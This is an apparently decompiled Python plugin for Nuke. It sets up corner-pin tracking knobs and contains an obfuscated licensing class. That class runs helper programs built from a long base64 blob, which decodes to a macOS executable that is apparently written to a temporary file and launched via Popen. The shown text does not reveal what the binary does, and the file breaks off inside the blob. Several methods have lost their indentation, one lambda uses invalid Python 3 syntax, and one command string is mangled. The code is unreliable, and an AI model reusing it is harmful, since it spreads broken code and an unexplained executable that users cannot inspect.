    # tuple-parameter lambda below is py2-only syntax and will not parse
    # under Python 3.
    return map(lambda (ac, aJ): b.AnimationKey(ac, aJ), eF)
def dg(d, eG, eH, eI, eJ):
    # Load tracking data from `d` into four knobs, one per point index 0-3
    # (corner-pin layout; see bu for what gets copied).
    bu(d, eG, 0)
    bu(d, eH, 1)
    bu(d, eI, 2)
    bu(d, eJ, 3)
def bu(d, knob, Y):
    # Animate `knob` from point index Y of data source `d`: existing keys on
    # both curves are cleared, then x values go into animation curve 0 and
    # y values into curve 1.
    knob.setAnimated()
    eK = Q(d.getPointValues(Y, 'x'))
    eL = Q(d.getPointValues(Y, 'y'))
    knob.animation(0).clear()
    knob.animation(1).clear()
    knob.animation(0).addKey(eK)
    knob.animation(1).addKey(eL)
def bv(Z, name, aK):
    # Add an XY knob (internal name `name`, label `aK`) to node Z for holding
    # corner-pin tracking data.
    dh = b.XY_Knob(name, aK)
    Z.addKnob(dh)
    dh.setTooltip('corner pin tracking data')
def eM(Z):
    # Build the corner-pin UI on node Z: a "load tracking data from file"
    # button, a divider, four pin XY knobs (via bv), and a time-offset knob.
    cf = b.PyScript_Knob('loadTrackingDataFromFile', 'load tracking data from file')
    cf.setTooltip('import mocha corner pin data from a file\n\nrequired format: Nuke Corner Pin (*.nk)')
    # The button's command is evaluated by Nuke when pressed; it relies on a
    # `cornerPinData` module being importable at that time.
    cf.setCommand('import cornerPinData\ncornerPinData___loadCornerPinDataFromFile(nuke.thisNode() )')
    Z.addKnob(cf)
    Z.addKnob(b.Text_Knob('divName', '', ''))
    bv(Z, 'pin1', 'pin 1')
    bv(Z, 'pin2', 'pin 2')
    bv(Z, 'pin3', 'pin 3')
    bv(Z, 'pin4', 'pin 4')
    di = b.Array_Knob('pinTimeOffset', 'Corner Pin Time Offset')
    di.setTooltip('shift your tracking data if it does not start at the first frame')
    Z.addKnob(di)
def eN(i, ai):
    # Mirror the standard transform/filter knobs of node `i` onto `ai` as
    # link knobs (see aj); the boolean selects whether the linked knob starts
    # a new UI line.
    aj(i, ai, 'filter', False)
    aj(i, ai, 'clamp', False)
    aj(i, ai, 'black_outside', False)
    aj(i, ai, 'motionblur', True)
    aj(i, ai, 'shutter', True)
    aj(i, ai, 'shutteroffset', True)
    aj(i, ai, 'shuttercustomoffset', False).setLabel('')
def aj(eO, eP, dj, eQ):
    # Create a Link_Knob named `dj` on node `eP` linked to knob `dj` of node
    # `eO`. `eQ` controls Nuke's STARTLINE layout flag (True = knob begins a
    # new row). Returns the newly created knob.
    knob = b.Link_Knob(dj)
    knob.makeLink(eO.name(), dj)
    if eQ:
        knob.setFlag(b.STARTLINE)
    else:
        knob.clearFlag(b.STARTLINE)
    eP.addKnob(knob)
    return knob
import nuke as b
from Qt import QtWidgets as l
from tempfile import mkstemp as hg
import os as al
import stat as dl
from subprocess import Popen, PIPE as fa
from platform import system as bw, architecture as eW
import re
class cg(Exception):
    # Licensing error: raised when removing, installing, or validating a
    # license fails (see the 'could not ... license' messages in eR).
    pass
class eR(object):
    def __init__(a, qqewrtz, qqrrtet):
        # `a` is self (decompiled/obfuscated naming throughout this class).
        # Stores two opaque values: qqewrtz is later passed as the first
        # element of the argv lists handed to the executors, qqrrtet as the
        # second argument to the validator run (see ertzz). Two executor
        # helper objects are built via a.ertuze() / a.hrrwre(), whose
        # semantics are defined elsewhere -- TODO confirm.
        a.qqewrtz = qqewrtz
        a.qqrrtet = qqrrtet
        a.qqgerter = a.ertuze()
        a.qqjztzt = a.hrrwre()
    def sddfg(a):
        # Remove the installed license: run the helper with '-' as argument.
        # ANY output on stdout or stderr is treated as failure.
        ad = a.qqgerter.execute([a.qqewrtz, '-'])
        ak = ad[0]
        ae = ad[1]
        if ak != '' or ae != '':
            raise cg('could not remove license' + str(ak) + str(ae))
def zzdfger(a, ch):
eS = re.compile('^[A-Z]{2}[A-Z0-9]{30}$')
s = eS.match(ch) != None
return s
    def ddsjz(a, ch):
        # Install license key `ch` (whitespace-stripped first). Unlike sddfg,
        # only stderr output counts as failure; stdout alone is tolerated.
        eT = ch.strip()
        ad = a.qqgerter.execute([a.qqewrtz, eT])
        ak = ad[0]
        ae = ad[1]
        if ae != '':
            raise cg('could not install license' + str(ak) + str(ae))
    def fggtzh(a):
        # True when the current license info reports status 'valid'.
        h = a.ertzz()
        return h['status'] == 'valid'
    def hf(a):
        # True when the license is valid AND its type is 'BTA'
        # (meaning of 'BTA' not visible here -- TODO confirm).
        h = a.ertzz()
        return h['status'] == 'valid' and h['license type'] == 'BTA'
    def ertzz(a):
        # Run the validator tool and return the parsed license-info dict
        # (fields produced by tetz). Any stderr output means validation
        # could not be performed and raises cg.
        ad = a.qqjztzt.execute([a.qqewrtz, a.qqrrtet])
        ak = ad[0]
        ae = ad[1]
        if ae != '':
            raise cg('could not validate license' + str(ak) + str(ae))
        h = a.tetz(ak)
        return h
def tetz(a, data):
eU = re.compile(
"^status:\\s*([^\\r\\n]*)\\s*first name:\\s*'(.*)'\\s*last name:\\s*'(.*)'\\s*number of user licenses:\\s*(\\d*)\\s*license type:\\s*'(.*)'\\s*pluginID")
ar = eU.match(data)
if ar == None:
raise Exception('invalid licensing info')
h = {'status': ar.group(1), 'first name': ar.group(2), 'last name': ar.group(3),
'number of user licenses': ar.group(4), 'license type': ar.group(5)}
return h
def hrrwre(a):
if a.__isMacOs():
R = at(
'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AALohAAAA6KtKAADrcEiJw0iLhbD+//9IjXjoSDs90mAAAA+EPAMAALn/////8A/BSPiFyQ+PKgMAAEiNtUD////oUkoAAOkZAwAASI29sP7//0iNNcdYAAC6HgAAAOhTSgAA6xhIjb2w/v//SI01zFgAALogAAAA6DlKAABIiz2AYAAASI011VgAALoIAAAA6I1KAABIi7Ww/v//SItW6EiLPV1gAADodkoAAEiNNbZYAABIice6AQAAAOhiSgAASIs9PWAAAEiNNZ1YAAC6DQAAAOhKSgAATI21uP7//0yJ9+izSgAASIs9FmAAAEyJ9kiJwugpSgAASIs9BGAAAEiNNXJYAAC6AgAAAOgRSgAASIs97F8AAEiNNV1YAAC6DAAAAOj5SQAATYXtdR9Iiz3PXwAASIsHSItA6It0ByBIAceDzgHo0UkAAOsaTInv6EVKAABIiz2oXwAATInuSInC6LtJAABIiz2WXwAASI01BFgAALoCAAAA6KNJAABIiz1+XwAASI01/FcAALoZAAAA6ItJAACLtfT+//9Iiz1gXwAA6ONIAABIjTW5VwAASInHugEAAADoZUkAAEiLPUBfAABIjTXYVwAAug8AAADoTUkAAE2F5HUfSIs9I18AAEiLB0iLQOiLdAcgSAHHg84B6CVJAADrGkyJ5+iZSQAASIs9/F4AAEyJ5kiJwugPSQAASIs96l4AAEiNNVhXAAC6AgAAAOj3SAAASIs90l4AAEiNNXpXAAC6CwAAAOjfSAAASIXbdR9Iiz21XgAASIsHSItA6It
0ByBIAceDzgHot0gAAOsaSInf6CtJAABIiz2OXgAASIneSInC6KFIAABIiz18XgAASI016lYAALoCAAAA6IlIAABIiz1kXgAASI01GFcAALoJAAAA6HFIAABIjZ0g////SIXbdR9Iiz1AXgAASIsHSItA6It0ByBIAceDzgHoQkgAAOsaSInf6LZIAABIiz0ZXgAASIneSInC6CxIAABIiz0HXgAASI01dVYAALoCAAAA6BRIAABIi4Ww/v//SI146Eg7PdRdAAB0Grn/////8A/BSPiFyX8MSI21SP///+hcRwAASIsF0V0AAEiLAEg7RdB1IESJ+EiBxDgBAABbQVxBXUFeQV9dw0iJw0iJ3+jgRwAA6OdHAACQkJBVSInlU1BIjR0DYAAASInf6I1HAABIiz1sXQAASI0VLe3//0iJ3kiDxAhbXemtRwAAVUiJ5TDAXcNVSInlMMBdw1VIieVBV0FWQVVBVFNIg+wYSInzSIn4SInHSYnFSIne6ABHAABIiwNIY0DoSYnESffcSI1I/0iJTdDrFEwB+EWINARI/03QSItFyP/ISf/EhcB+QkiJRchIiwODePgAeAtIid/odEYAAEiLA0iLTdBEijQITIt46EmLRQCDePgAeLpMiehIicdJicXoTUYAAEmLRQDrpkyJ6EiDxBhbQVxBXUFeQV9dw0iJw0yJ7+h4RgAASInf6NxGAADouUYAAFVIieVBV0FWQVVBVFNIg+x4ibVs////SYn+SI1dmEyNfaDrP7n/////8A/BSPiFyX8JSI11uOjoRQAASItFmEiNeOhIOz01XAAAdBe5//////APwUj4hcl/CUiNdcDowEUAAE2LLk2LZehJg/wJD4enAAAASInfSI01LlUAAEiNVZDo0kUAAEyJ/0iJ3kyJ8ugcRQAATIn3TIn+6KdFAABIi0WgSI146Eg7PdBbAAB0iulu////SInD6ytIicNIi0WgSI146Eg7PbJbAAB0F7n/////8A/BSPiFyX8JSI11yOg9RQAASItFmEiNeOhIOz2KWwAAD4SDAQAAuf/////wD8FI+IXJD49xAQAASI110OgNRQAA6WMBAAC5CAAAAEyJ4Ej34UiJww+QwUiJ2EiDwAgPksIIykjHx/////9ID0T46H1FAABIicdIg+P4SI01iV0AAEyJJ0iDxwhIib1w////SIna6KFFAABFMeS7/////+sduf/////wD8FI+IXJfwlIjXWw6JZEAABNiy5B/8RFiedNO33oD4PFAAAARIngMdL3tWz///+F0nUk/8NIY8NIi41w////SI08wUiLBMFIi1DoMfYxyeh9RAAATYsuQYN9+AB4C0yJ9+g7RAAATYsuQ4pEPQCIRY7GRY8ASI19gEiNdY5IjZV4////6FREAABIY8NIi41w////SI08wUiNdYDoH0QAAEiLRYBIjXjoSDs9VFoAAA+EXP///+lA////60NIicNIi0WASI146Eg7PTVaAAB0Mrn/////8A/BSPiFyX8kSI11qOjAQwAA6xlIi4Vw////SIPEeFtBXEFdQV5BX13DSInDSInf6FFEAABVSInlQVdBVkFVQVRTSIHsaAYAAInzSIsF/FkAAEiLAEiJRdBIizdIjb1w+///SI2VaPv//+iZQwAASIsFuFkAAEiDwBhIiYVg+///SImFWPv//0iJhVD7//9IiYVI+///RTDkgfughgEAiZ2A+f//D4xmHQAASI29cPv//0iNNaBSAAAx0rkBAAAA6K1CAABIicNIjVMBSI29cPv//0iNNX9SAAC5AQAAAOiOQgAASYnFSY1VAUiNvXD7//9IjTVgUgAAuQEAAADob0IAAEmJx0mNVwFIjb1w+///SI01QVIAALkBAAAA6FBCAAAxyUiD+/9ID0TZSYP9/0wPROlMiepICdpJg///TA9E+UiFwA+UwUiD+P8PlMBMCfp1DQjIRTDkhMAPhbAcAABIjb3Q+///SI21cPv
//zHSSInZ6P9BAABIjb1g+///SI210Pv//+hqQgAASIuF0Pv//0iNeOhIOz2QWAAAdBq5//////APwUj4hcl/DEiNtdj7///oGEIAAEiJ2Uj30UwB6Uj/w0iNvcj7//9IjbVw+///SIna6JxBAABIjb1Y+///SI21yPv//+gHQgAASIuFyPv//0iNeOhIOz0tWAAAdBq5//////APwUj4hcl/DEiNteD7///otUEAAEyJ6Uj30UwB+Un/xUiNvcD7//9IjbVw+///TInq6DlBAABIjb1Q+///SI21wPv//+ikQQAASIuFwPv//0iNeOhIOz3KVwAAdBq5//////APwUj4hcl/DEiNtej7///oUkEAAEiLhXD7//9Ii0joSf/HSI29uPv//0iNtXD7//9Mifro1EAAAEiNvUj7//9IjbW4+///6D9BAABIi4W4+///SI146Eg7PWVXAAB0Grn/////8A/BSPiFyX8MSI218Pv//+jtQAAASIuFSPv//0iLSOhIg8HxSI29QPv//0iNtUj7//+6DwAAAOhsQAAASI29OPv//0iNtUD7///o9UAAADDbSIuFOPv//0iDeOgED4K9AQAARTH/TI21OPv//+sDSf/HQYP/Ag+GYAEAAEG/AwAAAEyNtTj7//9IicHrDjDbgPo5D4+HAQAAQf/HRYn8swFMO2HoD4N1AQAAg3n4AHgSTIn36ENAAABIi4U4+///SInBQooUITDbgPowD4xOAQAAg3n4AHi2TIn36BxAAABIi4U4+///QooUIEiJweueSYnGSIuF0Pv//0iNeOhIOz1ZVgAAD4SYIQAAuf/////wD8FI+IXJD4+GIQAASI21+Pv//+l1IQAASYnGSIuFyPv//0iNeOhIOz0gVgAAD4RfIQAAuf/////wD8FI+IXJD49NIQAASI21APz//+k8IQAASYnGSIuFwPv//0iNeOhIOz3nVQAAD4QmIQAAuf/////wD8FI+IXJD48UIQAASI21CPz//+kDIQAASYnGSIuFuPv//0iNeOhIOz2uVQAAD4TtIAAAuf/////wD8FI+IXJD4/bIAAASI21EPz//+nKIAAASYnG6ccgAACDePgAeA9MiffoEj8AAEiLhTj7//9Cigw4MNuA+UF8JIN4+AB4E0yJ9+jyPgAASIuFOPv//0KKDDgw24D5Wg+OT/7//0iNeOhIOz0zVQAAdBq5//////APwUj4hcl/DEiNtRj8///ouz4AAEUw5ITbD4TBGAAASI29MPv//0iNtUj7//+6DgAAALkBAAAA6Dk+AABIjb0o+///SI21SPv//7oMAAAAuQIAAADoHD4AAEiNvSD7//9IjbVI+///MdK5DAAAAOgCPgAASI29SPv//0iNtSD7///obT4AAEiLhSD7//9IjXjoSDs9k1QAAHQauf/////wD8FI+IXJfwxIjbUo/P//6Bs+AABIjb0A+///SI21YPv//0iNlVj7///ojz0AAEiNvQj7//9IjbUA+///SI2VSPv//+h1PQAASI29EPv//0iNtQj7//9IjZVQ+///6Fs9AABIjb34+v//SI21QPv//+j8PQAASI29EPv//0iNtfj6///oWSAAAESLtYD5//9IjV2ASI01GU0AAEiJ34nCMMDoeT4AAEiNvRj7//9IjZUw/P//SIne6Kk9AABIi4X4+v//SI146Eg7Pb1TAAB0Grn/////8A/BSPiFyX8MSI21OPz//+hFPQAASIuFEPv//0iNeOhIOz2PUwAAdBq5//////APwUj4hcl/DEiNtUD8///oFz0AAEiLhQj7//9IjXjoSDs9YVMAAHQauf/////wD8FI+IXJfwxIjbVI/P//6Ok8AABIi4UA+///SI146Eg7PTNTAAB0Grn/////8A/BSPiFyX8MSI21UPz//+i7PAAASIuFGPv//0iLUOhIg8L+SI298Pr//0iNtRj7//+5AgAAAOg6PAAASI29GPv//0iNtfD
6///opTwAAEiLhfD6//9IjXjoSDs9y1IAAHQauf/////wD8FI+IXJfwxIjbVY/P//6FM8AABIi70o+///6BM9AABIicNIi70Y+///6AQ9AABFMORIOcMPhbMVAABIjb3o+v//SI21SPv//zHSuQIAAADouDsAAEiLvej6///ozDwAAEGJxEiNvdj6//9IjbVg+///SI2VWPv//+h3OwAASI294Pr//0iNtdj6//9IjZVQ+///6F07AABIjb3Q+v//SI21QPv//+j+OwAASI294Pr//0iNtdD6///oWx4AAImFfPn//0iLhdD6//9IjXjoSDs97VEAAHQauf/////wD8FI+IXJfwxIjbWQ/P//6HU7AABIi4Xg+v//SI146Eg7Pb9RAAB0Grn/////8A/BSPiFyX8MSI21mPz//+hHOwAASIuF2Pr//0iNeOhIOz2RUQAAdBq5//////APwUj4hcl/DEiNtaD8///oGTsAAEiNvbj6//9IjbVg+///SI2VWPv//+iNOgAASI29wPr//0iNtbj6//9IjZVQ+///6HM6AABIjb3I+v//SI21wPr//0iNlUj7///oWToAAEiNvbD6//9IjbVA+///6Po6AABIjb3I+v//SI21sPr//+hXHQAASIuFsPr//0iNeOhIOz3vUAAAdBq5//////APwUj4hcl/DEiNtaj8///odzoAAEiLhcj6//9IjXjoSDs9wVAAAHQauf/////wD8FI+IXJfwxIjbWw/P//6Ek6AABIi4XA+v//SI146Eg7PZNQAAB0Grn/////8A/BSPiFyX8MSI21uPz//+gbOgAASIuFuPr//0iNeOhIOz1lUAAAdBq5//////APwUj4hcl/DEiNtcD8///o7TkAAEiLhVj7//+DePgAeAxIjb1Y+///6M45AABIi4VQ+///g3j4AHgMSI29UPv//+i1OQAASI1dgEiNNTRJAABIid9EifIwwOiTOgAASI29oPr//0iNlcj8//9Iid7owzkAAEiLhaD6//+DePgAeBNIjb2g+v//6G45AABIi4Wg+v//igiIjaj6//9IjXjoSDs9tk8AAHQauf/////wD8FI+IXJfwxIjbUI/f//6D45AADGhan6//8ASI29qPr//+jxOQAASI2dqvr//0iNNU5IAABIid+JwjDA6AE6AABIjb2Y+v//SI2VkPr//0iJ3ugxOQAASIu9mPr//+i1OQAAicFBa9wKidiZ9/lBidVIi4VI+///SItI6EiDwf5Ijb2I+v//SI21SPv//7oCAAAA6GA4AABIjb1I+///SI21iPr//+jLOAAASIuFiPr//0iNeOhIOz3xTgAAdBq5//////APwUj4hcl/DEiNtRD9///oeTgAAEiNvXj6//9IjbVI+///6Kg4AABIjb2A+v//SI21ePr//+hw8f//SI29SPv//0iNtYD6///oZDgAAEiLhYD6//9IjXjoSDs9ik4AAHQauf/////wD8FI+IXJfwxIjbUY/f//6BI4AABIi4V4+v//SI146Eg7PVxOAAB0Grn/////8A/BSPiFyX8MSI21IP3//+jkNwAASIsFOU4AAEiDwBhIiYVw+v//SImFaPr//0iNvWj6//9IjbVI+///6Nw3AABEKetIY8NMafiZmZmZTIn4SMHoP0nB/yJBAcdDjUQ8AYmFiPn//0UB50Ux7UWJ/EWJ/seFjPn//wAAAABEieNIi4VI+///SDtY6HMpg3j4AHgTSI29SPv//+hUNwAASIuFSPv//w++NBhIjb1w+v//6HM3AABEifZIi4Vo+v//SDtw6HMRSI29aPr//7oBAAAA6C43AABEietIi4Vw+v//SDtY6HMtg3j4AHgTSI29cPr//+j6NgAASIuFcPr//w++DBiLlYz5//+NVArQiZWM+f//RQH+RAOliPn//0H/xUGD/QQPhVL///9Ig3joBESLtYD5//8PhScDAACLlYz5///phgMAAOsASYn
GSIuFOPv//0iNeOhIOz32TAAAD4QHGAAAuf/////wD8FI+IXJD4/1FwAASI21IPz//+h2NgAA6eQXAABJicbpqRcAAEmJxkiLhSD7//9IjXjoSDs9sEwAAA+EYBcAALn/////8A/BSPiFyQ+PThcAAEiNtWD8///oMDYAAOk9FwAASYnG6ZcAAABJicbrZEmJxusxSYnGSIuF+Pr//0iNeOhIOz1gTAAAdBq5//////APwUj4hcl/DEiNtWj8///o6DUAAEiLhRD7//9IjXjoSDs9MkwAAHQauf/////wD8FI+IXJfwxIjbVw/P//6Lo1AABIi4UI+///SI146Eg7PQRMAAB0Grn/////8A/BSPiFyX8MSI21ePz//+iMNQAASIuFAPv//0iNeOhIOz3WSwAAD4SGFgAAuf/////wD8FI+IXJD490FgAASI21gPz//+hWNQAA6WMWAABJicZIi4Xw+v//SI146Eg7PZhLAAAPhBUWAAC5//////APwUj4hckPjwMWAABIjbWI/P//6Bg1AADp8hUAAEmJxutkSYnG6zFJicZIi4XQ+v//SI146Eg7PVBLAAB0Grn/////8A/BSPiFyX8MSI210Pz//+jYNAAASIuF4Pr//0iNeOhIOz0iSwAAdBq5//////APwUj4hcl/DEiNtdj8///oqjQAAEiLhdj6//9IjXjoSDs99EoAAA+EPhUAALn/////8A/BSPiFyQ+PLBUAAEiNteD8///odDQAAOkbFQAASYnG6ZcAAABJicbrZEmJxusxSYnGSIuFsPr//0iNeOhIOz2kSgAAdBq5//////APwUj4hcl/DEiNtej8///oLDQAAEiLhcj6//9IjXjoSDs9dkoAAHQauf/////wD8FI+IXJfwxIjbXw/P//6P4zAABIi4XA+v//SI146Eg7PUhKAAB0Grn/////8A/BSPiFyX8MSI21+Pz//+jQMwAASIuFuPr//0iNeOhIOz0aSgAAD4RkFAAAuf/////wD8FI+IXJD49SFAAASI21AP3//+iaMwAA6UEUAABIi4VI+///SItY6IN4+AB4E0iNvUj7///ocjMAAEiLhUj7//8PvnQY/0iNvXD6///okDMAAEiLhXD6//9Ii1jog3j4AHgTSI29cPr//+g9MwAASIuFcPr//w++RBj/i42M+f//jUwB0InKTI1lgEiNNaRCAABMiecwwOgGNAAASI29YPr//0iNlSj9//9MieboNjMAAEiLhWD6//9Ii1DoSP/KSI29WPr//0iNtWD6//+5AQAAAOiAMgAASI29YPr//0iNtVj6///o6zIAAEiLhVj6//9IjXjoSDs9EUkAAHQauf/////wD8FI+IXJfwxIjbUw/f//6JkyAABIi7Uw+///SIu9YPr//+h8MwAARTDkhcAPhRwLAABIjb1I+v//SI21cPr